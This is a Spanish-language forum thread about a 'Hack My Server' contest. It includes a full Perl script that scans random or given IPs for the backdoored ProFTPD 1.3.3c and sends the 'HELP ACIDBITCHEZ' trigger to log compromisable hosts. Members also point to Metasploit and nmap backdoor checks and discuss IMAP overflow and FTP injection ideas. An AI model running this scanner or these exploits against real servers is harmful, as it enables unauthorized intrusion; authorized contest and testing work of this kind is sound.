Autor
|
Tema: Concurso Nº1: "Hack My Server" (Leído 131,079 veces)
|
adastra
Endless Learner
Ex-Staff
Desconectado
Mensajes: 885
http://thehackerway.com/
|
el servicio proftpd que esta instalado no es vulnerable. Podéis probarlo con el script "bitchscan.pl" o directamente desde el modulo de metasploit "exploit/unix/ftp/proftpd_133c_backdoor" Para los que querais probar el script, pongo el código en la linea $ip = "x.x.x.x"; poner la dirección que os han enviado por correo, el script encuentra que el servicio tiene la versión que es vulnerable, pero después de ejecutar, no es posible establecer el backdoor, indicando que el servicio no es "hackeable". #!/usr/bin/perl use IO::Socket; ## IP GENERATOR ## print "\n! ProScan - Started !\n";
sub ipgen(){ my $range1 = 223; #avoid experimental and multicast my $range2 = 240; $oct1 = int(rand($range1)) + 1; #generate random octects $oct2 = int(rand($range2)) + 1; $oct3 = int(rand($range2)) + 1; $oct4 = int(rand($range2)) + 1;
if($oct1 == 127 || $oct1 == 172 || $oct1 == 192 || $oct1 == 10){#if gets rid of loopbacks and private ips $ip = &ipgen(); #if local or private call again }else{ #$ip = "$oct1.$oct2.$oct3.$oct4"; # otherwise allocate the ip to return $ip = "x.x.x.x"; } return $ip; #return to caller } ## ## MAIN ## while(1==1){ # keeps code running indefinatly $target = &ipgen(); # get random ip to scan print "SCANNING: $target \n"; # output my $sock = new IO::Socket::INET ( # try to create socket to chose random address PeerAddr => $target, PeerPort => '21', Proto => 'tcp', Timeout => '3', # you can get away with a timeout of 1 second but i have 3 to be safe ); if($sock){ # if socket opened (port open)
sysread($sock,$buf,1024); # readheader - may need to make the buffer size 4096 instead of 1024 print "FTP SUCCESS: $target \n"; # print to screen if ($buf =~ m/ProFTPD 1.3.3c/){ print "\n!!Proftpd 1.3.3c Found!!\n"; print $sock "HELP ACIDBITCHEZ\n"; sysread($sock,$buf,1024); if ($buf =~ m/502/){ print "\n NOT HACKABLE \n"; }else{ print $buf; print "\n\n HACKABLE BOX FOUND \n\n"; open (MYFILE, '>>proftpd_1.3.3c-exploitable.txt'); print MYFILE "Proftp Found: $target :$buf\n"; close(MYFILE); }
} } close($sock); # close the socket }##
|
|
|
En línea
|
|
|
|
Once
|
Incluso con nmap: nmap --script=ftp-proftpd-backdoor.nse <ip> <puerto> Saldos!
|
|
|
En línea
|
|
|
|
$Edu$
Desconectado
Mensajes: 1.842
|
Por fin pude!!!!
No mentira, Dimitrix, vos sabes si es vulnerable o no? esque sino me suena a que quieres ver que tan seguro es tu servidor xD Pensaba que vos ya sabrias que se podia hackear y nosotros tendriamos que probar, pero por como veo que han buscando info y todo y no hay caso :/
|
|
|
En línea
|
|
|
|
dimitrix
|
Por fin pude!!!! No mentira, Dimitrix, vos sabes si es vulnerable o no? esque sino me suena a que quieres ver que tan seguro es tu servidor xD Pensaba que vos ya sabrias que se podia hackear y nosotros tendriamos que probar, pero por como veo que han buscando info y todo y no hay caso :/
Todo servidor es hackeable, hace falta encontrar la vulnerabilidad. El servidor no tiene ni firewall ni nada, no obstante si el día 15 (o mejor el 7) nadie consigue nada, iré bajando la seguridad.
Estoy pensando que por ahora la seguridad perimetral es quizás muy difícil para casi todos por lo que el mes que viene haré. - Hack My Server: Joomla - Hack My Server: WP
|
|
|
En línea
|
|
|
|
lokitorz
Desconectado
Mensajes: 14
|
Buenas ví que tiene un servidor de correo IMAP. Creo que IMAP tiene una vulnerabilidad que mediante un desbordamiento de buffer se podría conseguir obtener una shell... Me voy a poner a ello.
|
|
|
En línea
|
|
|
|
josezoft
Desconectado
Mensajes: 1
|
Me puedes pasar la ip por privado Saludos
|
|
|
En línea
|
|
|
|
Xenomorfo77
Desconectado
Mensajes: 61
|
Hola señores, todavia no he mirado nada de esto, se sabe si hay alguna cuenta en el FTP? Buscando por la red encontre una vulnerabilidad para las versiones inferiores a la 1.3.3g. La vulnerabilidad se basa en enviar un comando inexistente o erroneo al servidor mientras se esta descargando o subiendo un archivo. La vulnerabilidad permitiria inyectar cogido arbitrario. http://foro.elhacker.net/scripting/ayuda_con_script_python-t360564.0.htmlEn ese link creado por mi teneis los scripts pero para uso local y necesitamos alguien con conocimientos en python para que lo pase a remoto, yo lo he intentado pero no tengo ni idea de python si alguien sabe que ponga la respuesta en el link. Un saludo y suerte.
|
|
|
En línea
|
|
|
|
h1t
Desconectado
Mensajes: 10
|
Hola buenas después de mirar la información de dimitrix sobre los servicios del server, voy a probar el siguiente: Servicio 22/tcp open ssh OpenSSH 5.3p1 Debian 3ubuntu7 (protocol 2.0)
voy a investigar un poco más sobre eso y a ver que sale.
: )
|
|
|
En línea
|
|
|
|
pajaras
|
me puedes enviar la IP? mercii!
|
|
|
En línea
|
|
|
|
peib0l
Wiki
Desconectado
Mensajes: 3.493
freedom
|
quiero la ip ... manda-mela a @elhacker me la suda el server yo solo quiero la cerveza, y lo sabes soy un borracho jajaja
|
|
|
En línea
|
|
|
|
|
Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
GFXMACHINE, presenta "Concurso Por Un Dominio"
Diseño Gráfico
|
+ enrique ZP
|
0
|
2,171
|
19 Octubre 2005, 04:24 am
por + enrique ZP
|
|
|
De donde puedo descargar utilidades: "Formas", "Estilos", "Motivos", D
Diseño Gráfico
|
Ad0nis
|
2
|
8,906
|
2 Septiembre 2006, 15:48 pm
por Ad0nis
|
|
|
[Ayuda] modificar "start page" en "internet explorer" con "batch"
Scripting
|
taton
|
7
|
17,378
|
20 Septiembre 2006, 01:45 am
por taton
|
|
|
recursos visual basic, """"""proceso inmortal"""""
Análisis y Diseño de Malware
|
Dark4ngel
|
7
|
14,264
|
3 Noviembre 2011, 10:42 am
por Dark4ngel
|
|
|
Tema: Concurso Nº1 "Hackeame" Ethical Hack
« 1 2 3 4 5 »
Hacking
|
Gtorna
|
43
|
33,222
|
1 Agosto 2012, 16:32 pm
por it3r
|
|